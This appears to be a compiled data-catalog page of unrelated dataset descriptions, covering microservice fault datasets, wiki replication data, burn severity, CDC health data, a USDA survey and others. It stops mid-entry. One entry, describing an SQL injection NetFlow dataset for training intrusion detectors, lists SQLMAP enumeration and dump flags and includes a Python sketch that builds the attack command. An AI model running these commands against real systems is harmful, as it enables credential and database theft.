Company Datasets for valuable business insights!
Discover new business prospects, identify investment opportunities, track competitor performance, and streamline your sales efforts with comprehensive Company Datasets.
These datasets are sourced from top industry providers, ensuring you have access to high-quality information:
We provide fresh and ready-to-use company data, eliminating the need for complex scraping and parsing. Our data includes crucial details such as:
You can choose your preferred data delivery method, including various storage options, delivery frequency, and input/output formats.
Receive datasets in CSV, JSON, and other formats, with storage options like AWS S3 and Google Cloud Storage. Opt for one-time, monthly, quarterly, or bi-annual data delivery.
With Oxylabs Datasets, you can count on:
Pricing Options:
Standard Datasets: Choose from various ready-to-use datasets with standardized data schemas, priced from $1,000/month.
Custom Datasets: Tailor datasets from any public web domain to your unique business needs. Contact our sales team for custom pricing.
Experience a seamless journey with Oxylabs:
Unlock the power of data with Oxylabs' Company Datasets and supercharge your business insights today!
The total amount of data created, captured, copied, and consumed globally is forecast to increase rapidly. While it was estimated at ***** zettabytes in 2025, the forecast for 2029 stands at ***** zettabytes; global data generation is thus expected to triple between 2025 and 2029. Data creation has expanded continuously over the past decade. In 2020, growth was higher than previously expected, driven by increased demand during the coronavirus (COVID-19) pandemic, as more people worked and learned from home and made heavier use of home entertainment options.
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Artifacts for the paper titled Root Cause Analysis for Microservice System based on Causal Inference: How Far Are We?.
This artifact repository contains 9 compressed folders, as follows:
ID | File Name | Description
1 | syn_circa.zip | CIRCA10 and CIRCA50 datasets for Causal Discovery
2 | syn_rcd.zip | RCD10 and RCD50 datasets for Causal Discovery
3 | syn_causil.zip | CausIL10 and CausIL50 datasets for Causal Discovery
4 | rca_circa.zip | CIRCA10 and CIRCA50 datasets for RCA
5 | rca_rcd.zip | RCD10 and RCD50 datasets for RCA
6 | online-boutique.zip | Online Boutique dataset for RCA
7 | sock-shop-1.zip | Sock Shop 1 dataset for RCA
8 | sock-shop-2.zip | Sock Shop 2 dataset for RCA
9 | train-ticket.zip | Train Ticket dataset for RCA
Each zip file contains the generated/collected data from the corresponding data generator or microservice benchmark systems (e.g., online-boutique.zip contains metrics data collected from the Online Boutique system).
Details about the generation of our datasets
We use three synthetic data generators from three previous RCA studies [15, 25, 28] to create the synthetic datasets: the CIRCA, RCD, and CausIL data generators. Their mechanisms are as follows:
1. The CIRCA data generator [28] generates a random causal directed acyclic graph (DAG) based on a given number of nodes and edges. From this DAG, time series data for each node is generated using a vector auto-regression (VAR) model. A fault is injected into a node by altering the noise term in the VAR model for two timestamps.
2. The RCD data generator [25] uses the pyAgrum package [3] to generate a random DAG based on a given number of nodes, subsequently generating discrete time series data for each node, with values ranging from 0 to 5. A fault is introduced into a node by changing its conditional probability distribution.
3. The CausIL data generator [15] generates causal graphs and time series data that simulate the behavior of microservice systems. It first constructs a DAG of services and metrics based on domain knowledge, then generates metric data for each node of the DAG using regressors trained on real metrics data. Unlike the CIRCA and RCD data generators, the CausIL data generator cannot inject faults.
To create our synthetic datasets, we first generate 10 DAGs with 10 to 50 nodes for each synthetic data generator. Next, we generate fault-free datasets from these DAGs with different seeds, resulting in 100 cases for the CIRCA and RCD generators and 10 cases for the CausIL generator. We then create faulty datasets by introducing ten faults into each DAG and generating the corresponding faulty data, yielding 100 cases for the CIRCA and RCD data generators. The fault-free datasets (e.g., syn_rcd, syn_circa) are used to evaluate causal discovery methods, while the faulty datasets (e.g., rca_rcd, rca_circa) are used to assess RCA methods.
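As an illustration of the CIRCA-style mechanism described above, the following is a minimal sketch (not the actual generator from [28]; function names and parameters are our own) of building a random DAG and generating VAR-style data with a noise-term fault:

```python
import numpy as np

def random_dag(n_nodes, n_edges, rng):
    """Random DAG: only edges i -> j with i < j, so acyclicity is guaranteed."""
    adj = np.zeros((n_nodes, n_nodes))
    candidates = [(i, j) for i in range(n_nodes) for j in range(i + 1, n_nodes)]
    for k in rng.choice(len(candidates), size=n_edges, replace=False):
        i, j = candidates[k]
        adj[i, j] = rng.uniform(0.5, 1.0)  # edge weight
    return adj

def generate_var_data(adj, n_steps, rng, fault_node=None, fault_at=None):
    """VAR(1)-style series: each node is a weighted sum of its parents'
    previous values plus Gaussian noise; a fault inflates the noise term
    of one node for two consecutive timestamps."""
    n = adj.shape[0]
    data = np.zeros((n_steps, n))
    for t in range(1, n_steps):
        noise = rng.normal(0.0, 0.1, size=n)
        if fault_node is not None and t in (fault_at, fault_at + 1):
            noise[fault_node] += 5.0  # injected fault
        data[t] = data[t - 1] @ adj + noise
    return data

rng = np.random.default_rng(0)
adj = random_dag(10, 15, rng)
normal = generate_var_data(adj, 500, rng)
faulty = generate_var_data(adj, 500, rng, fault_node=3, fault_at=250)
```

Because the adjacency matrix is strictly upper-triangular, the induced linear dynamics cannot feed back on themselves, so the series stays bounded.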
We deploy three popular benchmark microservice systems: Sock Shop [6], Online Boutique [4], and Train Ticket [8], on a four-node Kubernetes cluster hosted on AWS. Next, we use the Istio service mesh [2] with Prometheus [5] and cAdvisor [1] to monitor and collect resource-level and service-level metrics of all services, as in previous works [25, 39, 59]. To generate traffic, we use the load generators provided by these systems and customise them to exercise all services with 100 to 200 concurrent users. We then introduce five common faults (CPU hog, memory leak, disk IO stress, network delay, and packet loss) into five different services within each system. Finally, we collect metrics data before and after the fault injection operation. An overview of our setup is presented in the Figure below.
Code
The code to reproduce the experimental results in the paper is available at https://github.com/phamquiluan/RCAEval.
References
As in our paper.
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Introduction
This dataset contains SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are Union-query SQL injection and Blind SQL injection, performed with the SQLMAP tool.
The NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for collecting and monitoring network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The first dataset (D1) was collected to train the detection models; the second (D2) was collected using different attacks than those used in training, in order to test the models and ensure their generalization.
The datasets contain both benign and malicious traffic. All collected datasets are balanced.
The version of NetFlow used to build the datasets is 5.
Dataset | Aim | Samples | Benign-malicious traffic ratio
D1 | Training | 400,003 | 50%
D2 | Test | 57,239 | 50%
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA, a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator with the ipt_netflow sensor installed. The sensor is a Linux kernel module that uses Iptables to process packets and convert them into NetFlow flows.
DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds or active for 1,800 seconds (30 minutes).
Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts; users may customize them or incorporate their own. The network traffic is managed by a gateway that performs two main tasks: it routes packets to the Internet, and it sends them to a NetFlow data generation node (packets received from the Internet are handled similarly).
The malicious traffic (SQLI attacks) was generated using SQLMAP, a penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities.
The attacks were executed from 16 nodes, each launching SQLMAP with the parameters in the following table.
Parameters | Description
--banner, --current-user, --current-db, --hostname, --is-dba, --users, --passwords, --privileges, --roles, --dbs, --tables, --columns, --schema, --count, --dump, --comments | Enumerate users, password hashes, privileges, roles, databases, tables, and columns
--level=5 | Increase the probability of a false positive identification
--risk=3 | Increase the probability of extracting data
--random-agent | Select the User-Agent randomly
--batch | Never ask for user input; use the default behavior
--answers="follow=Y" | Predefine answers to yes
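For concreteness, the full command line for one attack node can be assembled as follows. This is a sketch: the target URL is hypothetical, and the flags are the ones listed in the table.

```python
import shlex

# Enumeration flags from the table above.
ENUM_FLAGS = [
    "--banner", "--current-user", "--current-db", "--hostname", "--is-dba",
    "--users", "--passwords", "--privileges", "--roles", "--dbs",
    "--tables", "--columns", "--schema", "--count", "--dump", "--comments",
]

def build_sqlmap_command(target_url):
    """Assemble the SQLMAP invocation used against a single victim node."""
    return (["sqlmap", "-u", target_url] + ENUM_FLAGS
            + ["--level=5", "--risk=3", "--random-agent", "--batch",
               "--answers=follow=Y"])

cmd = build_sqlmap_command("http://192.0.2.10/vulnerable-form.php?id=1")
print(shlex.join(cmd))
```

`--batch` and `--answers` matter here because the attacks run unattended across 16 nodes; without them SQLMAP would block waiting for interactive input.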
Every node executed SQLIA on 200 victim nodes. Each victim node had a web form deployed that was vulnerable to Union-type injection attacks, connected to either a MySQL or a SQLServer database engine (50% of the victim nodes deployed MySQL and the other 50% SQLServer).
The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.
However, for D2, Blind SQL injection attacks were performed against a web form connected to a PostgreSQL database. The IP address spaces of the networks also differed from those of D1: in D2, the address space was 152.148.48.1/24 for the benign and malicious traffic-generating nodes and 140.30.20.1/24 for the victim nodes.
MariaDB version 10.4.12 was used as the MySQL server; Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used for the other engines.
This archive contains code and data for reproducing the analysis for "Replication Data for Revisiting 'The Rise and Decline' in a Population of Peer Production Projects". Depending on what you hope to do with the data, you probably do not want to download all of the files; depending on your computational resources, you may not be able to run all stages of the analysis.

The code for all stages of the analysis, including typesetting the manuscript and running the analysis, is in code.tar. If you only want to run the final analysis or to play with the datasets used in the paper's analysis, you want intermediate_data.7z or the uncompressed tab and csv files.

The data files are created in a four-stage process. The first stage uses the program "wikiq" to parse MediaWiki XML dumps and create tsv files that have edit data for each wiki. The second stage combines these tsvs into all.edits.RDS, a dataset of edits from all the wikis; this file is expensive to generate and, at 1.5 GB, is pretty big. The third stage builds smaller intermediate files that contain the analytical variables from these tsv files. The fourth stage uses the intermediate files to generate smaller RDS files that contain the results. Finally, knitr and LaTeX typeset the manuscript.

A stage will only run if the outputs from the previous stages do not exist, so if the intermediate files exist they will not be regenerated and only the final analysis will run. The exception is stage 4, fitting models and generating plots, which always runs. If you only want to replicate from the second stage onward, you want wikiq_tsvs.7z. If you want to replicate everything, you want wikia_mediawiki_xml_dumps.7z.001, wikia_mediawiki_xml_dumps.7z.002, and wikia_mediawiki_xml_dumps.7z.003.

These instructions work backwards from building the manuscript using knitr, through loading the datasets and running the analysis, to building the intermediate datasets.
Building the manuscript using knitr
This requires working latex, latexmk, and knitr installations. Depending on your operating system you might install these packages in different ways; on Debian Linux you can run apt install r-cran-knitr latexmk texlive-latex-extra. Alternatively, you can upload the necessary files to a project on Overleaf.com. Download code.tar; this has everything you need to typeset the manuscript. Unpack the tar archive (on a unix system: tar xf code.tar) and navigate to code/paper_source. Install the R dependencies: in R, run install.packages(c("data.table","scales","ggplot2","lubridate","texreg")). On a unix system you should then be able to run make to build the manuscript generalizable_wiki.pdf. Otherwise, try uploading all of the files (including the tables, figure, and knitr folders) to a new project on Overleaf.com.

Loading intermediate datasets
The intermediate datasets are found in the intermediate_data.7z archive. They can be extracted on a unix system using the command 7z x intermediate_data.7z; the files are 95 MB uncompressed. These are RDS (R data set) files and can be loaded in R using readRDS, for example newcomer.ds <- readRDS("newcomers.RDS"). If you wish to work with these datasets using a tool other than R, you might prefer the .tab files.

Running the analysis
Fitting the models may not work on machines with less than 32 GB of RAM. If you have trouble, you may find the functions in lib-01-sample-datasets.R useful for creating stratified samples of data for fitting models; see line 89 of 02_model_newcomer_survival.R for an example. Download code.tar and intermediate_data.7z to your working folder and extract both archives (on a unix system: tar xf code.tar && 7z x intermediate_data.7z). Install the R dependencies: install.packages(c("data.table","ggplot2","urltools","texreg","optimx","lme4","bootstrap","scales","effects","lubridate","devtools","roxygen2")). On a unix system you can then simply run regen.all.sh to fit the models, build the plots, and create the RDS files.

Generating datasets
Building the intermediate files: the intermediate files are generated from all.edits.RDS, a process that requires about 20 GB of memory. Download all.edits.RDS, userroles_data.7z, selected.wikis.csv, and code.tar. Unpack code.tar and userroles_data.7z (on a unix system: tar xf code.tar && 7z x userroles_data.7z). Install the R dependencies as above, then run 01_build_datasets.R.

Building all.edits.RDS: the intermediate RDS files used in the analysis are created from all.edits.RDS. To replicate building all.edits.RDS, you only need to run 01_build_datasets.R when the int... Visit https://dataone.org/datasets/sha256%3Acfa4980c107154267d8eb6dc0753ed0fde655a73a062c0c2f5af33f237da3437 for complete metadata about this dataset.
I wanted to run data analysis and machine learning on a large dataset to build my data science skills, but I felt out of touch with the various datasets available, so I thought... how about I try and build my own dataset?
I wondered what data should be in the dataset and settled with online digital game purchases since I am an avid gamer. Imagine getting sales data from the PlayStation Store or Xbox Microsoft Store, this is what I was aiming to replicate.
I envisaged the dataset to be data created through the purchase of a digital game on either the UK PlayStation Store or Xbox Microsoft Store. Considering this, the scope of the dataset varies depending on which column of data you are viewing, for example:
- Date and Time: purchases were defined between a start/end date (this can be altered, see point 4) and, of course, any time across the 24hr clock
- Geographically: purchases were set up to come from any postcode in the UK; in total this is over 1,000,000 active postcodes
- Purchases: the list of game titles available for purchase is 24
- Registered Banks: the list of registered banks in the UK (as of 03/2022) was 159
To generate the dataset, I built a Python function that takes the number of rows you want: for example, calling function(1000) returns a dataset with 1,000 rows.
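A minimal sketch of such a generator (illustrative column names and placeholder title/pricing logic; not the actual code from the GitHub repository):

```python
import random
from datetime import datetime, timedelta

STORES = ["UK PlayStation Store", "Xbox Microsoft Store"]
GAME_TITLES = [f"Game Title {i}" for i in range(1, 25)]  # 24 titles, as in the dataset

def generate_dataset(n_rows, start=datetime(2022, 1, 1), end=datetime(2022, 12, 31)):
    """Return n_rows synthetic purchase records with random timestamps
    between the (editable) start and end dates."""
    span_seconds = int((end - start).total_seconds())
    return [
        {
            "purchase_datetime": start + timedelta(seconds=random.randrange(span_seconds)),
            "store": random.choice(STORES),
            "title": random.choice(GAME_TITLES),
            "price_gbp": round(random.uniform(3.99, 69.99), 2),  # placeholder pricing
        }
        for _ in range(n_rows)
    ]

rows = generate_dataset(1000)
```

Changing the start/end arguments is what the note below refers to: the timespan the dataset covers is just the sampling window for the timestamp column.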
Considering this, if just over 42,000 rows of data (42,892 to be exact) isn't enough, feel free to check out the code on my GitHub to run the function yourself with as many rows as you want.
Note: You can also edit the start/end dates of the function depending on which timespan you want the dataset to cover.
As stated above, this dataset is still a work in progress and is therefore not 100% perfect. There is a backlog of issues that need to be resolved; feel free to check out the backlog.
One example: in various columns the data is evenly distributed, when in fact, for the dataset to be entirely random, this should not be the case. The Time column is one instance of this issue. These issues will be resolved in a later update.
Database Contents License (DbCL) v1.0: http://opendatacommons.org/licenses/dbcl/1.0/
The invoice dataset provided is a mock dataset generated using the Python Faker library. It has been designed to mimic the format of data collected from an online store. The dataset contains various fields, including first name, last name, email, product ID, quantity, amount, invoice date, address, city, and stock code. All of the data in the dataset is randomly generated and does not represent actual individuals or products. The dataset can be used for various purposes, including testing algorithms or models related to invoice management, e-commerce, or customer behavior analysis. The data in this dataset can be used to identify trends, patterns, or anomalies in online shopping behavior, which can help businesses to optimize their online sales strategies.
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Construct validity results.
RdNBR is a remotely sensed index of the pre- to post-fire change in vegetation greenness, in this case between the growing seasons in the year prior to and the year after the year in which the fire occurred. The mean composite scene selection method utilizes all valid pixels in all Landsat scenes over a specified date range to calculate the fire severity index. The CBI is a standardized field measure of vegetation burn severity (Key and Benson 2006), which here is predicted from a remotely sensed fire severity index using regression equations developed between CBI field plot data and the remote index, RBR (Parks et al 2019). The dataset provides an estimation of the severity of past fires, with fire severity defined here as fire-induced change to vegetation. The dataset is limited to fires included in CAL FIRE's Historic Wildland Fire Perimeters database and is therefore subject to the same limitations in terms of missing or erroneous data. This web app was developed to satisfy the requirements of Senate Bill No. 1101: an act to amend Sections 10295 and 10340 of the Public Contract Code, and to add Section 4114.4 to the Public Resources Code, relating to fire prevention.

Methods:
To develop these datasets, a feature service for fire perimeters was created from the CAL FIRE Fire and Resource Assessment Program's Historic Wildland Fire Perimeters database (firep23_1) for fires, or fires that were part of complexes, >= 1,000 acres from 2015 to 2023. This feature service is viewable on the California Vegetation Burn Severity Viewer and is used to discover the RdNBR and CBI vegetation burn severity datasets. The feature service is titled Burn Severity Fire Perimeters (firep23_1_2015_2023_Fires_Complex_1000ac). After this feature service was uploaded to Google Earth Engine (GEE) as an asset, the Parks et al. 2018 script was used to generate RdNBR values with offset (rdnbr_w_offset) data for each individual fire and the Parks et al.
2019 script was used to generate bias-corrected Composite Burn Index (cbi_bc) data for each individual fire, using 30 m resolution Landsat Collection 2 data. To specify the date range of Landsat satellite images queried to create the one-year pre-fire and one-year post-fire mean composite image scenes in both scripts, the variable 'startday' was set to 152 (June 1st) and the variable 'endday' was set to 258 (September 15th) for all fires, as specified in Parks et al. (2019); these values correspond to the leaf-on period for the State of California. Once the RdNBR raster data for each fire had been produced using the Parks et al. 2018 GEE script and the CBI raster data using the Parks et al. 2019 GEE script, a Python script (run in a Jupyter Notebook embedded in ArcGIS Pro) was used to clip each fire-specific continuous feature class to the extent of its fire perimeter. Each CBI feature class was additionally clipped to the extent of the Conifer Forest and Hardwood Forest classes (defined in FVEG15's WHR13 Lifeform class for fires from 2015 to 2021 and in FVEG22's WHR13 Lifeform class for fires from 2022 to 2023).

Once each continuous feature class had been clipped, values were reclassified to create discrete RdNBR and CBI feature classes. Classes for RdNBR were arbitrarily chosen and do not correspond to meaningful categories of burn severity. Higher RdNBR values do indicate greater loss of vegetation greenness and negative values indicate an increase in greenness, but there is not necessarily a direct or linear correlation between RdNBR values and impacts to vegetation or ecological effects.
Remotely sensed fire severity indices are translated into CBI using regression equations developed between CBI field plot data and the remote indices. Very few CBI plots exist in California or elsewhere in the U.S. for vegetation types other than forest; we therefore chose to include only forest vegetation in our CBI dataset.

Classes for RdNBR were as follows:

Code | Lower Limit (RdNBR) | Upper Limit (RdNBR)
1 | < -1,000 | -1,000
2 | -1,000 | -800
3 | -800 | -600
4 | -600 | -400
5 | -400 | -200
6 | -200 | 0
7 | 0 | 200
8 | 200 | 400
9 | 400 | 600
10 | 600 | 800
11 | 800 | 1,000
12 | 1,000 | 1,200
13 | 1,200 | 1,400
14 | 1,400 | 1,600
15 | 1,600 | > 1,600

Classes for CBI were as follows:

Code | Lower Limit (CBI) | Upper Limit (CBI) | Burn Severity
1 | 0.00 | 0.10 | Unburned
2 | 0.10 | 1.25 | Low Vegetation Burn Severity
3 | 1.25 | 2.25 | Moderate Vegetation Burn Severity
4 | 2.25 | 3.00 | High Vegetation Burn Severity

The discrete raster feature classes were then converted to vector feature classes. Finally, all individual discrete vector feature classes for individual fires were merged into two vector datasets, RdNBR Burn Severity Data (BurnSeverityRdNBR1523_1) and CBI Burn Severity Data (BurnSeverityCBIForest1523_1). These feature services are viewable on this web app, the California Vegetation Burn Severity Viewer.
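The reclassification step can be sketched with NumPy (our own illustration; the actual work used a Python script inside ArcGIS Pro). `np.digitize` maps continuous RdNBR or CBI values onto the 1-based class codes using the breakpoints listed above:

```python
import numpy as np

# Class breakpoints taken from the RdNBR and CBI class listings above.
RDNBR_BREAKS = [-1000, -800, -600, -400, -200, 0, 200, 400,
                600, 800, 1000, 1200, 1400, 1600]
CBI_BREAKS = [0.10, 1.25, 2.25]
CBI_SEVERITY = ["Unburned", "Low", "Moderate", "High"]

def classify(values, breaks):
    """Map continuous severity values to 1-based class codes:
    values below the first break get code 1, values at or above the
    last break get code len(breaks) + 1."""
    return np.digitize(values, breaks) + 1

rdnbr_codes = classify([-1200.0, -50.0, 450.0, 1700.0], RDNBR_BREAKS)
cbi_codes = classify([0.05, 0.8, 1.5, 2.9], CBI_BREAKS)
```

For example, an RdNBR value of 450 falls in the 400-600 bin and gets code 9, and a CBI of 2.9 falls in the 2.25-3.00 bin, i.e. High Vegetation Burn Severity.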
Apache License, v2.0: https://www.apache.org/licenses/LICENSE-2.0
License information was derived automatically
A common problem when creating models to generate business value from data is that the datasets can be so large that it can take days for the model to generate predictions. Ensuring that your dataset is stored as efficiently as possible is crucial for allowing these models to run on a more reasonable timescale without having to reduce the size of the dataset.
You've been hired by a major online data science training provider called Training Data Ltd. to clean up one of their largest customer datasets. This dataset will eventually be used to predict whether their students are looking for a new job or not, information that they will then use to direct them to prospective recruiters.
You've been given access to customer_train.csv, which is a subset of their entire customer dataset, so you can create a proof-of-concept of a much more efficient storage solution. The dataset contains anonymized student information, and whether they were looking for a new job or not during training:
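One common approach to this storage problem is to downcast numeric columns and convert repetitive strings to categoricals. Below is a sketch with pandas, using made-up stand-in columns (the real customer_train.csv schema may differ):

```python
import pandas as pd

# Toy stand-in for a slice of customer_train.csv; column names are illustrative.
df = pd.DataFrame({
    "student_id": [101, 102, 103, 104],
    "city_development_index": [0.92, 0.78, 0.92, 0.66],
    "experience": ["<1", "5", "5", ">20"],
    "job_change": [0, 1, 0, 0],
})

compact = df.copy()
# Shrink integers/floats to the smallest dtype that holds the values.
compact["student_id"] = pd.to_numeric(compact["student_id"], downcast="integer")
compact["city_development_index"] = pd.to_numeric(
    compact["city_development_index"], downcast="float")
# Repeated strings compress well as categoricals; 0/1 flags as booleans.
compact["experience"] = compact["experience"].astype("category")
compact["job_change"] = compact["job_change"].astype("bool")

print(compact.dtypes)
```

On a real multi-million-row file these conversions routinely cut memory use severalfold, which is exactly what lets prediction jobs run on a reasonable timescale without shrinking the dataset itself.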
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This tutorial will teach you how to take time-series data from many field sites and create a shareable online map, where clicking on a field location brings you to a page with interactive graph(s).
The tutorial can be completed with a sample dataset (provided via a Google Drive link within the document) or with your own time-series data from multiple field sites.
Part 1 covers how to make interactive graphs in Google Data Studio and Part 2 covers how to link data pages to an interactive map with ArcGIS Online. The tutorial will take 1-2 hours to complete.
An example interactive map and data portal can be found at: https://temple.maps.arcgis.com/apps/View/index.html?appid=a259e4ec88c94ddfbf3528dc8a5d77e8
The Reddit Subreddit Dataset by Dataplex offers a comprehensive and detailed view of Reddit’s vast ecosystem, now enhanced with appended AI-generated columns that provide additional insights and categorization. This dataset includes data from over 2.1 million subreddits, making it an invaluable resource for a wide range of analytical applications, from social media analysis to market research.
Dataset Overview:
This dataset includes detailed information on subreddit activities, user interactions, post frequency, comment data, and more. The inclusion of AI-generated columns adds an extra layer of analysis, offering sentiment analysis, topic categorization, and predictive insights that help users better understand the dynamics of each subreddit.
2.1 Million Subreddits with Enhanced AI Insights: The dataset covers over 2.1 million subreddits and now includes AI-enhanced columns that provide:
- Sentiment Analysis: AI-driven sentiment scores for posts and comments, allowing users to gauge community mood and reactions.
- Topic Categorization: Automated categorization of subreddit content into relevant topics, making it easier to filter and analyze specific types of discussions.
- Predictive Insights: AI models that predict trends, content virality, and user engagement, helping users anticipate future developments within subreddits.
Sourced Directly from Reddit:
All social media data in this dataset is sourced directly from Reddit, ensuring accuracy and authenticity. The dataset is updated regularly, reflecting the latest trends and user interactions on the platform. This ensures that users have access to the most current and relevant data for their analyses.
Key Features:
Use Cases:
Data Quality and Reliability:
The Reddit Subreddit Dataset emphasizes data quality and reliability. Each record is carefully compiled from Reddit’s vast database, ensuring that the information is both accurate and up-to-date. The AI-generated columns further enhance the dataset's value, providing automated insights that help users quickly identify key trends and sentiments.
Integration and Usability:
The dataset is provided in a format that is compatible with most data analysis tools and platforms, making it easy to integrate into existing workflows. Users can quickly import, analyze, and utilize the data for various applications, from market research to academic studies.
User-Friendly Structure and Metadata:
The data is organized for easy navigation and analysis, with metadata files included to help users identify relevant subreddits and data points. The AI-enhanced columns are clearly labeled and structured, allowing users to efficiently incorporate these insights into their analyses.
Ideal For:
This dataset is an essential resource for anyone looking to understand the intricacies of Reddit's vast ecosystem, offering the data and AI-enhanced insights needed to drive informed decisions and strategies across various fields. Whether you’re tracking emerging trends, analyzing user behavior, or conduc...
CC0 1.0 Universal Public Domain Dedication: https://creativecommons.org/publicdomain/zero/1.0/
License information was derived automatically
This interactive tool allows users to generate tables and graphs on information relating to pregnancy and childbirth. All data comes from the CDC's PRAMS. Topics include breastfeeding, prenatal care, insurance coverage, and alcohol use during pregnancy.

Background: CPONDER is the interactive online data tool for the Centers for Disease Control and Prevention (CDC)'s Pregnancy Risk Assessment Monitoring System (PRAMS). PRAMS gathers state- and national-level data on a variety of topics related to pregnancy and childbirth, including breastfeeding, alcohol use, multivitamin use, prenatal care, and contraception.

User Functionality: Users select choices from three drop-down menus (state, year, and topic) to search for data. They can then select the specific PRAMS question they are interested in, and the data table or graph will appear. Users can then compare that question to another state or another year to generate a new data table or graph.

Data Notes: The data source for CPONDER is PRAMS. Data is from every year between 2000 and 2008 and is available at the state and national level. However, states must have participated in PRAMS to be part of CPONDER; not every state, and not every year for every state, is available.
The USDA Agricultural Research Service (ARS) recently established SCINet, which consists of a shared high-performance computing resource, Ceres, and the dedicated high-speed Internet2 network used to access Ceres. Current and potential SCINet users are using and generating very large datasets, so SCINet needs to be provisioned with adequate data storage for their active computing; it is not designed to hold data beyond active research phases. At the same time, the National Agricultural Library has been developing the Ag Data Commons, a research data catalog and repository designed for public data release and professional data curation. Ag Data Commons needs to anticipate the size and nature of data it will be tasked with handling. The ARS Web-enabled Databases Working Group, organized under the SCINet initiative, conducted a study to establish baseline data storage needs and practices, and to make projections that could inform future infrastructure design, purchases, and policies. The working group helped develop the survey which is the basis for an internal report. While the report was for internal use, the survey and resulting data may be generally useful and are being released publicly. From October 24 to November 8, 2016 we administered a 17-question survey (Appendix A) by emailing a Survey Monkey link to all ARS Research Leaders, intending to cover the data storage needs of all 1,675 SY (Category 1 and Category 4) scientists. We designed the survey to accommodate either individual researcher responses or group responses. Research Leaders could decide, based on their unit's practices or their management preferences, whether to delegate the response to a data management expert in their unit, to all members of their unit, or to collate responses from their unit themselves before reporting in the survey.
Larger storage ranges cover vastly different amounts of data, so the implications here could be significant depending on whether the true amount lies at the lower or higher end of the range. We therefore requested more detail from "Big Data users," the 47 respondents who indicated more than 10 to 100 TB or over 100 TB of total current data (Q5). All other respondents are called "Small Data users." Because not all of these follow-up requests were successful, we used the actual follow-up responses to estimate likely responses for those who did not respond. We defined active data as data that would be used within the next six months; all other data is considered inactive, or archival. To calculate per-person storage needs, we used the high end of the reported range divided by 1 for an individual response, or by G, the number of individuals covered by a group response. For Big Data users we used the actual reported values or estimated likely values.

Resources in this dataset:

Resource Title: Appendix A: ARS data storage survey questions. File Name: Appendix A.pdf. Resource Description: The full list of questions asked, with the possible responses. The survey was not administered using this PDF; the PDF was generated directly from the administered survey using the Print option under Design Survey. Asterisked questions were required. A list of Research Units and their associated codes was provided in a drop-down not shown here. Resource Software Recommended: Adobe Acrobat, url: https://get.adobe.com/reader/

Resource Title: CSV of Responses from ARS Researcher Data Storage Survey. File Name: Machine-readable survey response data.csv. Resource Description: CSV file of raw responses from the administered survey, as downloaded unfiltered from Survey Monkey, including incomplete responses. Also includes additional classification and calculations to support analysis. Individual email addresses and IP addresses have been removed. This is the same data as in the Excel spreadsheet (also provided).

Resource Title: Responses from ARS Researcher Data Storage Survey. File Name: Data Storage Survey Data for public release.xlsx. Resource Description: MS Excel worksheet of raw responses from the administered survey, as downloaded unfiltered from Survey Monkey, including incomplete responses. Also includes additional classification and calculations to support analysis. Individual email addresses and IP addresses have been removed. Resource Software Recommended: Microsoft Excel, url: https://products.office.com/en-us/excel
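The per-person storage calculation described above can be sketched as follows. This is an illustrative reconstruction, not the survey's actual analysis code; the range labels, high-end values, and example group sizes are assumptions.

```python
# Per-person storage estimate, as described in the text: take the high end
# of the reported storage range and divide by the number of people the
# response covers (1 for an individual response, G for a group response).
# Range labels and TB values here are illustrative, not the survey's schema.

RANGE_HIGH_TB = {
    "under 1 TB": 1,
    "1 to 10 TB": 10,
    "10 to 100 TB": 100,
}

def per_person_tb(range_label, group_size=1):
    """High end of the reported range divided by the people covered."""
    return RANGE_HIGH_TB[range_label] / group_size

# An individual reporting 1-10 TB counts as 10 TB for that one person;
# a 5-person group reporting the same range counts as 2 TB per person.
print(per_person_tb("1 to 10 TB"))                 # 10.0
print(per_person_tb("1 to 10 TB", group_size=5))   # 2.0
```

Using the high end of each range makes the estimate deliberately conservative (an upper bound), which matches the report's concern that true amounts may sit anywhere within wide ranges.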
This dataset contains model-based census tract level estimates for the PLACES 2022 release in GIS-friendly format. PLACES covers the entire United States—50 states and the District of Columbia (DC)—at county, place, census tract, and ZIP Code Tabulation Area levels. It provides information uniformly on this large scale for local areas at 4 geographic levels. Estimates were provided by the Centers for Disease Control and Prevention (CDC), Division of Population Health, Epidemiology and Surveillance Branch. PLACES was funded by the Robert Wood Johnson Foundation in conjunction with the CDC Foundation. Data sources used to generate these model-based estimates include Behavioral Risk Factor Surveillance System (BRFSS) 2020 or 2019 data, Census Bureau 2010 population estimates, and American Community Survey (ACS) 2015–2019 estimates. The 2022 release uses 2020 BRFSS data for 25 measures and 2019 BRFSS data for 4 measures (high blood pressure, taking high blood pressure medication, high cholesterol, and cholesterol screening) that the survey collects data on every other year. These data can be joined with the census tract 2015 boundary file in a GIS system to produce maps for 29 measures at the census tract level. An ArcGIS Online feature service is also available for users to make maps online or to add data to desktop GIS software. https://cdcarcgis.maps.arcgis.com/home/item.html?id=3b7221d4e47740cab9235b839fa55cd7
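The tract-level join described above is an attribute join on the tract FIPS code, which can be sketched outside a GIS as below. Field names, FIPS codes, and values are illustrative assumptions, not the release's actual schema.

```python
# Join PLACES tract-level estimates to tract boundary records on the tract
# FIPS code, as a GIS would do before mapping. All field names and values
# here are hypothetical stand-ins for the real PLACES / TIGER attributes.

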